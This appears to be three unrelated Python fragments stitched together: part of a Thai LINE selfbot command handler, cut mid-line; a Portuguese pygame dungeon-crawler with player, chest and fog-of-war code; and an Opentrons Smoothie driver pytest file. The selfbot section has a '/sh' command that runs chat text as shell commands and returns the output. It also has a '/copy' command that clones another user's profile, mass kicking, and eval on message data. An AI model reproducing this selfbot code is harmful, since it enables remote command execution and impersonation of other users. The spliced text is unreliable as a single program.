phusui.sendMessage(msg.to,str(int(round((time.time() - start) * 1000)))+" ปิง")
elif text.lower() in ["/restart"]:
phusui.sendMessage(to, "กำลังเริ่มใหม่...")
time.sleep(1)
phusui.sendMessage(to, "SELF BOT BYPHUSUI")
phusui.sendMessage(to, "บอทได้ทำการเริ่มใหม่สำเร็จแล้ว")
restartBot()
elif text.lower() in ["/runtime"]:
phusui.sendMessage(msg.to,str(datetime.now() - start_runtime)[:-7].split(":")[0]+" hour, "+str(datetime.now() - start_runtime)[:-7].split(":")[1]+" minute, "+str(datetime.now() - start_runtime)[:-7].split(":")[2]+" second,")
elif text.lower() in ["/invitetocall"]:
exc = phusui.getGroup(msg.to).members
zxc = phusui.getProfile().mid
phusui.inviteIntoGroupCall(msg.to,[uid.mid for uid in exc if uid.mid != zxc])
phusui.sendMessage(msg.to,"เชิญเข้าร่วมการคอลเรียบร้อยแล้วครับ:)")
elif "/upname " in msg.text.lower():
spl = re.split("/upname ",msg.text,flags=re.IGNORECASE)
if spl[0] == "":
prof = phusui.getProfile()
prof.displayName = spl[1]
phusui.updateProfile(prof)
phusui.sendMessage(msg.to,"เปลี่ยนชื่อสำเร็จแล้ว:)")
elif msg.text.lower().startswith("/blockid "):
user = msg.text.lower().replace("/blockid ","")
phusui.blockContact(user)
phusui.sendMessage(to, "ทำการบล็อคไอดีนั้นแล้ว")
elif "/sh " in msg.text.lower():
spl = re.split("/sh ",msg.text,flags=re.IGNORECASE)
if spl[0] == "":
try:
phusui.sendMessage(msg.to,subprocess.getoutput(spl[1]))
except:
pass
elif "/uid " in msg.text.lower():
if msg.toType == 2:
red = re.compile(re.escape('/uid '),re.IGNORECASE)
namel = red.sub('',msg.text)
namel = namel.lstrip()
namel = namel.replace(" @","$spliter$")
namel = namel.replace("@","")
namel = namel.rstrip()
namel = namel.split("$spliter$")
gmem = phusui.getGroup(msg.to).members
for targ in gmem:
if targ.displayName in namel:
phusui.sendMessage(msg.to,targ.displayName+": "+targ.mid)
elif "/bye" in msg.text.lower():
if msg.contentMetadata is not None:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
phusui.kickoutFromGroup(msg.to,[target])
except:
phusui.kickoutFromGroup(msg.to,[target])
else:
pass
elif msg.text.lower().startswith("/cgroup "):
phusui.sendMessage(to, "กำลังตรวจสอบข้อมูล...")
if 'MENTION' in msg.contentMetadata.keys() != None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
G = phusui.getGroupIdsJoined()
cgroup = phusui.getGroups(G)
ngroup = ""
for mention in mentionees:
for x in range(len(cgroup)):
gMembMids = [contact.mid for contact in cgroup[x].members]
if mention['M'] in gMembMids:
ngroup += "\n➢ " + cgroup[x].name + " | สมาชิก: " +str(len(cgroup[x].members))
if ngroup == "":
phusui.sendMessage(to, "ไม่พบ")
else:
phusui.sendMessage(to, "***ตรวจพบอยู่ในกลุ่ม %s"%(ngroup))
elif msg.text.lower().startswith("/copy "):
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
if len(lists) != []:
ls = random.choice(lists)
cloneProfile(ls)
phusui.sendMentionFooter(to, 'copy\n', sender, "http://line.me/ti/p/~botline2034", "http://dl.profile.line-cdn.net/"+phusui.getContact(sender).pictureStatus, phusui.getContact(sender).displayName);phusui.sendMessage(to, phusui.getContact(sender).displayName, contentMetadata = {'previewUrl': 'http://dl.profile.line-cdn.net/'+phusui.getContact(sender).pictureStatus, 'i-installUrl': 'http://line.me/ti/p/~botline2034', 'type': 'mt', 'subText': " ", 'a-installUrl': 'http://line.me/ti/p/~botline2034', 'a-installUrl': ' http://line.me/ti/p/~botline2034', 'a-packageName': 'com.spotify.music', 'countryCode': 'ID', 'a-linkUri': 'http://line.me/ti/p/~botline2034', 'i-linkUri': 'http://line.me/ti/p/~botline2034', 'id': 'mt000000000a6b79f9', 'text': ' ', 'linkUri': 'http://line.me/ti/p/~botline2034'}, contentType=19)
phusui.sendMessage(to,"คัดลอกบัญชีเรียบร้อยแล้ว", contentMetadata = {'AGENT_ICON': 'http://dl.profile.line-cdn.net/'+phusui.getContact(mid).pictureStatus, 'AGENT_NAME': 'Creator', 'AGENT_LINK': 'https://bit.ly/2JpqZ7H'})
elif text.lower in ["/save"]:
try:
backupProfile()
phusui.sendMessage(to, "บันทึกสถานะบัญชีเรียบร้อยแล้ว", contentMetadata = {'AGENT_ICON': 'http://dl.profile.line-cdn.net/'+phusui.getContact(mid).pictureStatus, 'AGENT_NAME': 'Creator', 'AGENT_LINK': 'https://bit.ly/2JpqZ7H'})
except Exception as e:
phusui.sendMessage(to, "ไม่สามารถบันทึกสถานะบัญชีได้", contentMetadata = {'AGENT_ICON': 'http://dl.profile.line-cdn.net/'+phusui.getContact(mid).pictureStatus, 'AGENT_NAME': 'Creator', 'AGENT_LINK': 'https://bit.ly/2JpqZ7H'})
phusui.sendMessage(msg.to, str(e))
elif text.lower in ["/load"]:
try:
restoreProfile()
phusui.sendMentionFooter(to, 'ãloadã\n', sender, "http://line.me/ti/p/~botline2034", "http://dl.profile.line-cdn.net/"+phusui.getContact(sender).pictureStatus, phusui.getContact(sender).displayName);phusui.sendMessage(to, phusui.getContact(sender).displayName, contentMetadata = {'previewUrl': 'http://dl.profile.line-cdn.net/'+phusui.getContact(sender).pictureStatus, 'i-installUrl': 'http://line.me/ti/p/~botline2034', 'type': 'mt', 'subText': " ", 'a-installUrl': 'http://line.me/ti/p/~botline2034', 'a-installUrl': ' http://line.me/ti/p/~botline2034', 'a-packageName': 'com.spotify.music', 'countryCode': 'ID', 'a-linkUri': 'http://line.me/ti/p/~botline2034', 'i-linkUri': 'http://line.me/ti/p/~botline2034', 'id': 'mt000000000a6b79f9', 'text': ' ', 'linkUri': 'http://line.me/ti/p/~botline2034'}, contentType=19)
phusui.sendMessage(to, "เรียกคืนสถานะบัญชีสำเร็จโปรดรอสักครู่จนกว่าโปรไฟล์จะเปลี่ยน", contentMetadata = {'AGENT_ICON': 'http://dl.profile.line-cdn.net/'+phusui.getContact(mid).pictureStatus, 'AGENT_NAME': 'Creator', 'AGENT_LINK': 'https://bit.ly/2JpqZ7H'})
except Exception as e:
phusui.sendMessage(to, "ไม่สามารถเรียกคืนสถานะบัญชีได้", contentMetadata = {'AGENT_ICON': 'http://dl.profile.line-cdn.net/'+phusui.getContact(mid).pictureStatus, 'AGENT_NAME': 'Creator', 'AGENT_LINK': 'https://bit.ly/2JpqZ7H'})
phusui.sendMessage(msg.to, str(e))
elif msg.text.lower().startswith("/addfriend "):
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
phusui.findAndAddContactsByMid(ls)
phusui.sendMessage(to, "เพิ่มเพื่อนแล้ว!")
elif msg.text.lower().startswith("/delfriend "):
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
phusui.deleteContact(ls)
phusui.sendMessage(to, "ลบออกจากการเป็นเพื่อนแล้ว!")
elif msg.text.lower().startswith("/info "):
if phusui != None:
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
me = phusui.getContact(ls)
path = phusui.getProfileCoverURL(ls)
path = str(path)
if settings["server"] == "VPS":
phusui.sendMessage(msg.to,"「 Display Name 」\n" + me.displayName)
phusui.sendMessage(msg.to,"「 Status Message 」\n" + me.statusMessage)
phusui.sendMessage(msg.to,"「 MID 」\n" + to)
phusui.sendMessage(to, text=None, contentMetadata={'mid': ls}, contentType=13)
phusui.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + me.pictureStatus)
phusui.sendImageWithURL(to, | |
import pygame
import mapaController
import cheater
import spriteLoader as tiles
import random
import time
import os
import sys
class Player:
def __init__(self):
self.xp = 0
self.nivel = 1
self.sprite_atual = tiles.playerDict[pygame.K_s]
# 24, 35 (final em cima)
# 25, 34 (final esquerda)
self.pos = (1, 1)
self.maxHP = 100
self.status = Stats(self.maxHP, 10, 10, 10, 10, 10)
self.potions = 0
self.weapon = Stats(0, 0, 0, 0, 0, 0)
self.armor = Stats(0, 0, 0, 0, 0, 0)
def adicionaXP(self, quantidade):
if(quantidade >= 100):
self.xp += 101
else:
self.xp += quantidade
if(self.xp % 100 >= 1):
while (self.xp > 100):
if(self.xp % 100 >= 1):
self.nivel += 1
self.xp -= 100
self.maxHP += 50
self.status.vida = self.maxHP
self.status.acuracia += random.randint(0, 10) + self.nivel
self.status.critico += random.randint(0, 10) + self.nivel
self.status.defesa += random.randint(0, 10) + self.nivel
self.status.destreza += random.randint(0, 10) + self.nivel
self.status.forca += random.randint(0, 10) + self.nivel
def mostraStats(self):
textXP = basicfont.render(
'XP: ' + str(self.xp), True, (0, 0, 0), (255, 255, 255))
txtLVL = basicfont.render(
'Nível: ' + str(self.nivel), True, (0, 0, 0), (255, 255, 255))
txtArmorHP = " + " + str(self.armor.vida)
txtWeaponHP = " + " + str(self.weapon.vida)
totalHP = " = " + str(self.status.vida +
self.armor.vida + self.weapon.vida)
txtHP = basicfont.render(
'Vida: ' + str(self.status.vida) + txtArmorHP + txtWeaponHP + totalHP, True, (0, 0, 0), (255, 255, 255))
txtArmorF = " + " + str(self.armor.forca)
txtWeaponF = " + " + str(self.weapon.forca)
totalF = " = " + str(self.status.forca +
self.armor.forca + self.weapon.forca)
txtForca = basicfont.render(
'Força: ' + str(self.status.forca) + txtArmorF + txtWeaponF + totalF, True, (0, 0, 0), (255, 255, 255))
txtArmorD = " + " + str(self.armor.defesa)
txtWeaponD = " + " + str(self.weapon.defesa)
totalD = " = " + str(self.status.defesa +
self.armor.defesa + self.weapon.defesa)
txtDefesa = basicfont.render(
'Defesa: ' + str(self.status.defesa) + txtArmorD + txtWeaponD + totalD, True, (0, 0, 0), (255, 255, 255))
txtArmorA = " + " + str(self.armor.acuracia)
txtWeaponA = " + " + str(self.weapon.acuracia)
totalA = " = " + str(self.status.acuracia +
self.armor.acuracia + self.weapon.acuracia)
txtAcura = basicfont.render(
'Acurácia: ' + str(self.status.acuracia) + txtArmorA + txtWeaponA + totalA, True, (0, 0, 0), (255, 255, 255))
txtArmorH = " + " + str(self.armor.destreza)
txtWeaponH = " + " + str(self.weapon.destreza)
totalH = " = " + str(self.status.destreza +
self.armor.destreza + self.weapon.destreza)
txtDex = basicfont.render(
'Destreza: ' + str(self.status.destreza) + txtArmorH + txtWeaponH + totalH, True, (0, 0, 0), (255, 255, 255))
txtArmorC = " + " + str(self.armor.critico)
txtWeaponC = " + " + str(self.weapon.critico)
totalC = " = " + str(self.status.critico +
self.armor.critico + self.weapon.critico)
txtCrit = basicfont.render(
'Crítico: ' + str(self.status.critico) + txtArmorC + txtWeaponC + totalC, True, (0, 0, 0), (255, 255, 255))
textP = basicfont.render(
'Poções: ' + str(self.potions), True, (0, 0, 0), (255, 255, 255))
# forca, critico, destreza, acuracia, defesa
textStatus = basicfont.render(
'Status + Armadura + Arma', True, (0, 0, 0), (255, 255, 255))
screen.blit(txtLVL, (5, 5))
screen.blit(textXP, (100, 5))
screen.blit(txtHP, (200, 5))
screen.blit(textStatus, (650, 450))
screen.blit(txtForca, (650, 475))
screen.blit(txtCrit, (650, 500))
screen.blit(txtDex, (650, 525))
screen.blit(txtDefesa, (650, 550))
screen.blit(txtAcura, (650, 575))
screen.blit(textP, (650, 600))
def andar(self, direcao, mapa):
x = self.pos[0]
y = self.pos[1]
pos = (x, y)
if direcao == pygame.K_w:
pos = (x - 1, y)
self.sprite_atual = tiles.playerDict[direcao]
if direcao == pygame.K_a:
pos = (x, y - 1)
self.sprite_atual = tiles.playerDict[direcao]
if direcao == pygame.K_s:
pos = (x + 1, y)
self.sprite_atual = tiles.playerDict[direcao]
if direcao == pygame.K_d:
pos = (x, y + 1)
self.sprite_atual = tiles.playerDict[direcao]
if(mapa[pos[0]][pos[1]] != "1"):
self.pos = pos
def desenhaPlayer(self):
screen.blit(self.sprite_atual,
(640+self.pos[1]*16, self.pos[0]*16))
class Bau:
def __init__(self, i, j):
self.pos = (i, j)
self.potions = 0
self.arma = None
self.armadura = None
def printaBau(self, mapa, player):
teclaApertada = None
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
exit()
elif event.type == pygame.KEYDOWN:
teclaApertada = event.key
player.mostraStats()
text1 = basicfont.render(
'Baú achado!', True, (0, 0, 0), (255, 255, 255))
string = None
if(self.arma):
txtVidaArma = (self.arma.vida - player.weapon.vida)
txtForcaArma = (self.arma.forca - player.weapon.forca)
txtCriticoArma = (self.arma.critico - player.weapon.critico)
txtDestrezaArma = (self.arma.destreza - player.weapon.destreza)
txtAcuraciaArma = (self.arma.acuracia - player.weapon.acuracia)
txtDefesaArma = (self.arma.defesa - player.weapon.defesa)
txtVidaArma = "+" + \
str(txtVidaArma) if txtVidaArma >= 0 else txtVidaArma
txtForcaArma = "+" + \
str(txtForcaArma) if txtForcaArma >= 0 else txtForcaArma
txtCriticoArma = "+" + \
str(txtCriticoArma) if txtCriticoArma >= 0 else txtCriticoArma
txtDestrezaArma = "+" + \
str(txtDestrezaArma) if txtDestrezaArma >= 0 else txtDestrezaArma
txtAcuraciaArma = "+" + \
str(txtAcuraciaArma) if txtAcuraciaArma >= 0 else txtAcuraciaArma
txtDefesaArma = "+" + \
str(txtDefesaArma) if txtDefesaArma >= 0 else txtDefesaArma
string = "Arma: {} {} {} {} {} {}".format(
txtVidaArma, txtForcaArma, txtCriticoArma, txtDestrezaArma, txtAcuraciaArma, txtDefesaArma)
else:
txtVidaArmadura = (self.armadura.vida - player.armor.vida)
txtForcaArmadura = (self.armadura.forca - player.armor.forca)
txtCriticoArmadura = (
self.armadura.critico - player.armor.critico)
txtDestrezaArmadura = (
self.armadura.destreza - player.armor.destreza)
txtAcuraciaArmadura = (
self.armadura.acuracia - player.armor.acuracia)
txtDefesaArmadura = (
self.armadura.defesa - player.armor.defesa)
txtVidaArmadura = "+" + \
str(txtVidaArmadura) if txtVidaArmadura >= 0 else txtVidaArmadura
txtForcaArmadura = "+" + \
str(txtForcaArmadura) if txtForcaArmadura >= 0 else txtForcaArmadura
txtCriticoArmadura = "+" + \
str(txtCriticoArmadura) if txtCriticoArmadura >= 0 else txtCriticoArmadura
txtDestrezaArmadura = "+" + \
str(txtDestrezaArmadura) if txtDestrezaArmadura >= 0 else txtDestrezaArmadura
txtAcuraciaArmadura = "+" + \
str(txtAcuraciaArmadura) if txtAcuraciaArmadura >= 0 else txtAcuraciaArmadura
txtDefesaArmadura = "+" + \
str(txtDefesaArmadura) if txtDefesaArmadura >= 0 else txtDefesaArmadura
string = "Armadura: {} {} {} {} {} {}".format(
txtVidaArmadura, txtForcaArmadura, txtCriticoArmadura, txtDestrezaArmadura, txtAcuraciaArmadura, txtDefesaArmadura)
text2 = basicfont.render(
'C - Pegar itens', True, (0, 0, 0), (255, 255, 255))
text3 = basicfont.render(
'X - Deixar para depois...', True, (0, 0, 0), (255, 255, 255))
conteudo = basicfont.render(
string, True, (0, 0, 0), (255, 255, 255))
pocoes = basicfont.render(
"E " + str(self.potions) + " poções", True, (0, 0, 0), (255, 255, 255))
screen.blit(text1, (200, 475))
screen.blit(conteudo, (200, 500))
screen.blit(pocoes, (200, 525))
screen.blit(text2, (200, 550))
screen.blit(text3, (200, 575))
pygame.display.update()
if(teclaApertada == pygame.K_c):
mapa.matriz[self.pos[0]][self.pos[1]] = "0"
if(self.arma):
player.weapon = self.arma
else:
player.armor = self.armadura
player.potions += self.potions
return
if(teclaApertada == pygame.K_x):
return False
class Mapa:
def __init__(self, mapa):
self.matriz = mapa
self.fog = mapaController.carregaMap("mapa.txt")
self.level = 1
self.baus = []
def iniciaFog(self):
fog = self.fog
for i in range(0, len(fog)):
for j in range(0, len(fog[i])):
fog[i][j] = 0
self.fog = fog
def controlaFog(self, player):
esquerda = player.pos[1] - 3 if player.pos[1] - 3 > 0 else 0
cima = player.pos[0] - 3 if player.pos[0] - 3 > 0 else 0
baixo = player.pos[0] + 4 if player.pos[0] + 4 < 27 else 27
direita = player.pos[1] + 4 if player.pos[1] + 4 < 37 else 37
for i in range(esquerda, direita):
for j in range(cima, baixo):
self.fog[j][i] = 1
return
def printFog(self):
for i in range(0, len(self.fog)):
for j in range(0, len(self.fog[i])):
if(self.fog[i][j] == 0):
screen.blit(
tiles.mapDict["F"], (640+j*16, i*16))
def printMap(self):
for i in range(0, len(self.matriz)):
for j in range(0, len(self.matriz[i])):
screen.blit(
tiles.mapDict["0"], (640+j*16, i*16))
screen.blit(
tiles.mapDict[self.matriz[i][j]], (640+j*16, i*16))
text1 = basicfont.render(
'Profundidade: ' + str(self.level), True, (0, 0, 0), (255, 255, 255))
screen.blit(text1, (975, 450))
def printMapCheater(self, matriz):
for i in range(0, len(matriz)):
for j in range(0, len(matriz[i])):
if(matriz[i][j] == -1):
screen.blit(
tiles.mapDict["1"], (640+j*16, i*16))
if(matriz[i][j] != -1):
screen.blit(
tiles.mapDict[self.matriz[i][j]], (640+j*16, i*16))
def contaBaus(self):
qtdeBaus = 0
for pos in self.matriz:
if pos == "B":
qtdeBaus += 1
return qtdeBaus
def geraItens(self, nivel, mapa):
for i in range(0, len(self.matriz)):
for j in range(0, len(self.matriz[i])):
if(self.matriz[i][j] == "B"):
bau = Bau(i, j)
bau.potions = random.randint(1, 3*nivel)
self.vida = random.randint(5, 10*nivel)
self.forca = random.randint(5, 10*nivel)
self.critico = random.randint(5, 10*nivel)
self.destreza = random.randint(5, 10*nivel)
self.acuracia = random.randint(5, 10*nivel)
self.defesa = random.randint(5, 10*nivel)
self.status = Stats(self.vida, self.forca, self.critico,
self.destreza, self.acuracia, self.defesa)
if(random.randint(1, 2) == 2):
bau.arma = self.status
else:
bau.armadura = self.status
mapa.baus.append(bau)
# ao chegar num baú, executa essa função de gerar os itens
# guarda a posição desse baú, ao executar, verifica se já existe
# se não existir, gera mais | |
from copy import deepcopy
from unittest.mock import Mock
import pytest
from opentrons.drivers.types import MoveSplit
from tests.opentrons.conftest import fuzzy_assert
from opentrons.config.robot_configs import (
DEFAULT_GANTRY_STEPS_PER_MM, DEFAULT_PIPETTE_CONFIGS)
from opentrons.drivers import serial_communication, utils
from opentrons.drivers.smoothie_drivers import driver_3_0
def position(x, y, z, a, b, c):
return {axis: value for axis, value in zip('XYZABC', [x, y, z, a, b, c])}
def test_update_position(smoothie, monkeypatch):
driver = smoothie
def _new_send_message(self, command, timeout=None):
return 'ok MCS: X:0.0000 Y:0.0000 Z:0.0000 A:0.0000 B:0.0000 C:0.0000'
monkeypatch.setattr(driver, '_send_command', _new_send_message)
driver.update_position()
expected = {
'X': 0,
'Y': 0,
'Z': 0,
'A': 0,
'B': 0,
'C': 0
}
assert driver.position == expected
count = 0
def _new_send_message2(self, command, timeout=None):
nonlocal count
# first attempt to read, we get bad data
msg = 'ok MCS: X:0.0000 Y:MISTAKE Z:0.0000 A:0.0000 B:0.0000 C:0.0000'
if count > 0:
# any following attempts to read, we get good data
msg = msg.replace('Y:MISTAKE', 'Y:0.0000')
count += 1
return msg
monkeypatch.setattr(driver, '_send_command', _new_send_message2)
driver.update_position()
expected = {
'X': 0,
'Y': 0,
'Z': 0,
'A': 0,
'B': 0,
'C': 0
}
assert driver.position == expected
@pytest.mark.parametrize(
argnames=["cmd", "resp", "expected"],
argvalues=[
# Remove command from response
["G28.2B", "G28.2B", ""],
["G28.2B G1", "G28.2B G1", ""],
["G28.2B G1", "G1G28.2BG1", ""],
# Remove command and whitespace from response
["\r\nG52\r\n\r\n", "\r\nG52\r\n\r\n", ""],
["\r\nG52\r\n\r\nsome-data\r\nok\r\n",
"\r\nG52\r\n\r\nsome-data\r\nok\r\nTESTS-RULE",
"TESTS-RULE"
],
["\r\nG52\r\n\r\nsome-data\r\nok\r\n",
"G52\r\n\r\nsome-data\r\nokT\r\nESTS-RULE",
"TESTS-RULE"],
# L is not a command echo but a token
["M371 L \r\n\r\n",
"L:703130",
"L:703130"],
# R is not a command echo but a token
["M3 R \r\n\r\n",
"M3R:703130",
"R:703130"],
["M369 L \r\n\r\n",
"M369 L \r\n\r\nL:5032304D56323032303230303432323036000000000000000000000000000000", # noqa: E501
"L:5032304D56323032303230303432323036000000000000000000000000000000"]
]
)
def test_remove_serial_echo(
smoothie: driver_3_0.SmoothieDriver_3_0_0,
cmd: str, resp: str, expected: str):
"""It should remove unwanted characters only."""
res = smoothie._remove_unwanted_characters(
cmd, resp)
assert res == expected
def test_parse_position_response(smoothie):
good_data = 'ok M114.2 X:10 Y:20 Z:30 A:40 B:50 C:60'
bad_data = 'ok M114.2 X:10 Y:20: Z:30A:40 B:50 C:60'
res = driver_3_0._parse_position_response(good_data)
expected = {
'X': 10,
'Y': 20,
'Z': 30,
'A': 40,
'B': 50,
'C': 60,
}
assert res == expected
with pytest.raises(driver_3_0.ParseError):
driver_3_0._parse_position_response(bad_data)
def test_dwell_and_activate_axes(smoothie, monkeypatch):
command_log = []
smoothie._setup()
smoothie.simulating = False
def write_with_log(command, ack, connection, timeout, tag=None):
command_log.append(command.strip())
return driver_3_0.SMOOTHIE_ACK
def _parse_position_response(arg):
return smoothie.position
monkeypatch.setattr(serial_communication, 'write_and_return',
write_with_log)
monkeypatch.setattr(
driver_3_0, '_parse_position_response', _parse_position_response)
smoothie.activate_axes('X')
smoothie._set_saved_current()
smoothie.dwell_axes('X')
smoothie._set_saved_current()
smoothie.activate_axes('XYBC')
smoothie._set_saved_current()
smoothie.dwell_axes('XC')
smoothie._set_saved_current()
smoothie.dwell_axes('BCY')
smoothie._set_saved_current()
expected = [
['M907 A0.1 B0.05 C0.05 X1.25 Y0.3 Z0.1 G4 P0.005'],
['M400'],
['M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4 P0.005'],
['M400'],
['M907 A0.1 B0.05 C0.05 X1.25 Y1.25 Z0.1 G4 P0.005'],
['M400'],
['M907 A0.1 B0.05 C0.05 X0.3 Y1.25 Z0.1 G4 P0.005'],
['M400'],
['M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4 P0.005'],
['M400'],
]
fuzzy_assert(result=command_log, expected=expected)
def test_disable_motor(smoothie, monkeypatch):
command_log = []
smoothie.simulating = False
def write_with_log(command, ack, connection, timeout, tag=None):
command_log.append(command.strip())
return driver_3_0.SMOOTHIE_ACK
def _parse_position_response(arg):
return smoothie.position
monkeypatch.setattr(serial_communication, 'write_and_return',
write_with_log)
monkeypatch.setattr(
driver_3_0, '_parse_position_response', _parse_position_response)
smoothie.disengage_axis('X')
smoothie.disengage_axis('XYZ')
smoothie.disengage_axis('ABCD')
expected = [
['M18 X'],
['M400'],
['M18 [XYZ]+'],
['M400'],
['M18 [ABC]+'],
['M400'],
]
fuzzy_assert(result=command_log, expected=expected)
def test_plunger_commands(smoothie, monkeypatch):
command_log = []
smoothie._setup()
smoothie.home()
smoothie.simulating = False
def write_with_log(command, ack, connection, timeout, tag=None):
command_log.append(command.strip())
return driver_3_0.SMOOTHIE_ACK
def _parse_position_response(arg):
return smoothie.position
monkeypatch.setattr(
serial_communication, 'write_and_return', write_with_log)
monkeypatch.setattr(
driver_3_0, '_parse_position_response', _parse_position_response)
smoothie.home()
expected = [
['M907 A0.8 B0.05 C0.05 X0.3 Y0.3 Z0.8 G4 P0.005 G28.2.+[ABCZ].+'],
['M400'],
['M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4 P0.005'],
['M400'],
['M203.1 Y50'],
['M400'],
['M907 A0.1 B0.05 C0.05 X0.3 Y0.8 Z0.1 G4 P0.005 G91 G0 Y-28 G0 Y10 G90'],
['M400'],
['M203.1 X80'],
['M400'],
['M907 A0.1 B0.05 C0.05 X1.25 Y0.3 Z0.1 G4 P0.005 G28.2 X'],
['M400'],
['M203.1 A125 B40 C40 X600 Y400 Z125'],
['M400'],
['M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4 P0.005'],
['M400'],
['M203.1 Y80'],
['M400'],
['M907 A0.1 B0.05 C0.05 X0.3 Y1.25 Z0.1 G4 P0.005 G28.2 Y'],
['M400'],
['M203.1 Y8'],
['M400'],
['G91 G0 Y-3 G90'],
['M400'],
['G28.2 Y'],
['M400'],
['G91 G0 Y-3 G90'],
['M400'],
['M203.1 A125 B40 C40 X600 Y400 Z125'],
['M400'],
['M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4 P0.005'],
['M400'],
['M114.2'],
['M400'],
]
fuzzy_assert(result=command_log, expected=expected)
command_log = []
smoothie.move({'X': 0, 'Y': 1.123456, 'Z': 2, 'A': 3})
expected = [
['M907 A0.8 B0.05 C0.05 X1.25 Y1.25 Z0.8 G4 P0.005 G0.+'],
['M400'],
]
fuzzy_assert(result=command_log, expected=expected)
command_log = []
smoothie.move({'B': 2})
expected = [
['M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4 P0.005 G0 B2'],
['M400'],
['M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4 P0.005'],
['M400'],
]
fuzzy_assert(result=command_log, expected=expected)
command_log = []
smoothie.move({
'X': 10.987654321,
'Y': 2.12345678,
'Z': 2.5,
'A': 3.5,
'B': 4.25,
'C': 5.55})
expected = [
# Set active axes high
['M907 A0.8 B0.05 C0.05 X1.25 Y1.25 Z0.8 G4 P0.005 G0.+[BC].+'],
['M400'],
# Set plunger current low
['M907 A0.8 B0.05 C0.05 X1.25 Y1.25 Z0.8 G4 P0.005'],
['M400'],
]
fuzzy_assert(result=command_log, expected=expected)
def test_move_with_split(smoothie, monkeypatch):
command_log = []
smoothie._setup()
smoothie.home()
smoothie.simulating = False
smoothie.configure_splits_for(
{
"B": MoveSplit(
split_distance=1,
split_current=1.75,
split_speed=1,
after_time=1800,
fullstep=True),
"C": MoveSplit(
split_distance=1,
split_current=1.75,
split_speed=1,
after_time=1800,
fullstep=True)
}
)
smoothie._steps_per_mm = {"B": 1.0, "C": 1.0}
def write_with_log(command, ack, connection, timeout, tag=None):
command_log.append(command.strip())
return driver_3_0.SMOOTHIE_ACK
def _parse_position_response(arg):
return smoothie.position
monkeypatch.setattr(
serial_communication, 'write_and_return', write_with_log)
monkeypatch.setattr(
driver_3_0, '_parse_position_response', _parse_position_response)
smoothie.move({'X': 0, 'Y': 1.123456, 'Z': 2, 'C': 3})
expected = [
['M55 M92 C0.03125 G4 P0.01 G0 F60 M907 A0.1 B0.05 C1.75 X1.25 Y1.25 '
'Z0.8 G4 P0.005'],
['M400'],
['G0 C18.0'],
['M400'],
['M54 M92 C1.0 G4 P0.01'],
['M400'],
['G0 F24000 M907 A0.1 B0.05 C0.05 X1.25 Y1.25 Z0.8 G4 P0.005 G0.+'],
['M400'],
['M907 A0.1 B0.05 C0.05 X1.25 Y1.25 Z0.8 G4 P0.005'],
['M400'],
]
fuzzy_assert(result=command_log, expected=expected)
command_log = []
smoothie.move({'B': 2})
expected = [
['M53 M92 B0.03125 G4 P0.01 G0 F60 M907 A0.1 B1.75 C0.05 '
'X0.3 Y0.3 Z0.1 G4 P0.005'],
['M400'],
['G0 B18.0'],
['M400'],
['M52 M92 B1.0 G4 P0.01'],
['M400'],
['M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4 P0.005 G0 B2'],
['M400'],
['M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4 P0.005'],
['M400'],
]
fuzzy_assert(result=command_log, expected=expected)
command_log = []
def test_set_active_current(smoothie, monkeypatch):
command_log = []
smoothie._setup()
smoothie.home()
smoothie.simulating = False
def write_with_log(command, ack, connection, timeout, tag=None):
command_log.append(command.strip())
return driver_3_0.SMOOTHIE_ACK
def _parse_position_response(arg):
return smoothie.position
monkeypatch.setattr(serial_communication, 'write_and_return',
write_with_log)
monkeypatch.setattr(
driver_3_0, '_parse_position_response', _parse_position_response)
smoothie.set_active_current(
{'X': 2, 'Y': 2, 'Z': 2, 'A': 2, 'B': 2, 'C': 2})
smoothie.set_dwelling_current(
{'X': 0, 'Y': 0, 'Z': 0, 'A': 0, 'B': 0, 'C': 0})
smoothie.move({'X': 0, 'Y': 0, 'Z': 0, 'A': 0, 'B': 0, 'C': 0})
smoothie.move({'B': 1, 'C': 1})
smoothie.set_active_current({'B': 0.42, 'C': 0.42})
smoothie.home('BC')
expected = [
# move all
['M907 A2 B2 C2 X2 Y2 Z2 G4 P0.005 G0 A0 B0 C0 X0 Y0 Z0'],
['M400'],
['M907 A2 B0 C0 X2 Y2 Z2 G4 P0.005'], # disable BC axes
['M400'],
# move BC
['M907 A0 B2 C2 X0 Y0 Z0 G4 P0.005 G0 B1.3 C1.3 G0 B1 C1'],
['M400'],
['M907 A0 B0 C0 X0 Y0 Z0 G4 P0.005'], # disable BC axes
['M400'],
